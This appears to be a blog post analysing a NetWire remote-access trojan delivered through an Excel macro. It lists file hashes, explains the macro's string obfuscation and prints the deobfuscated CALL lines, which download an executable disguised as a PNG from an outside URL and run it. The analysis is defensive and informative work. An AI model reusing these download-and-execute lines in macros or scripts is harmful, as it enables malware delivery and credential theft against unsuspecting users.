NetWire macro dropper

Overview

NetWire, is an old remote access tool commonly used in 2012 and recently taking part in phishing campaigns done via email.

Its purpose is to steal credentials, log keystrokes and send anything useful to the attacker back to its C2.

Fun fact, according to IBM X-Force IRIS, this malware has been seen in APTs attacks, Nigerian scammers and can be bought on the dark web from 40$ to 180$ depending on the marketplace.

Functionalities

  • Credential stealer
  • Keylogger
  • Remote Access Tool

General file information

MD5: 332f8351c92d72260846a9f8b5fdd7cb

SHA1: 1b924898977e10900eafcd655e282ae49bb476c1

SHA256: c6f066035c64a1309d1d958b6536882847da51f2eb5cebe670b05bbdd97c12d1

CAPE analysis: here

Any Run analysis: here

Hybrid Analysis: here

MITRE NetWire malware: here

Technical analysis

Macros

The malicious file is an excel document that asks the user to enable macros.

There’s nothing much to say besides how the macro downloads the payload and executes it. 

The image below shows the content inside the second page and, without further ado, we extracted the URLs and paths that the macro uses to download and install the payload.

In order to avoid detection, the strings containing the URL and additional parameters are being generated by concatenating each character together and using them inside the CALL function at the end of the page. 

Below there’s the deobfuscated strings and calling functions to create 2 directories, download the payload and execute it.

CALL(“Kernel32”,”CreateDirectoryA”,”JCJ”,”C:\jokwzPk”,0)
CALL(“Kernel32”,”CreateDirectoryA”,”JCJ”,”C:\jokwzPk\luFzdsM”,0)
CALL(“URLMON”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://17-14.com/wp-includes/images/2019.png”,”C:\jokwzPk\luFzdsM\LJDVSoK.exe”,0,0)
CALL(“Shell32”,”ShellExecuteA”,”JJCCCCJ”,0,”Open”,”C:\jokwzPk\luFzdsM\LJDVSoK.exe”,,0,0)

Lastly, the download PNG is an executable packed with NSIS and can be extracted with 7zip.

The PNG in the picture has something interested (most likely NetWire) attached at the end of its end byte:

At this point, we knew that the malicious executable was being extracted / read from this PNG but we had no clue how to analyse it since every time the debugger crashed.

Leave a Reply

Your email address will not be published. Required fields are marked *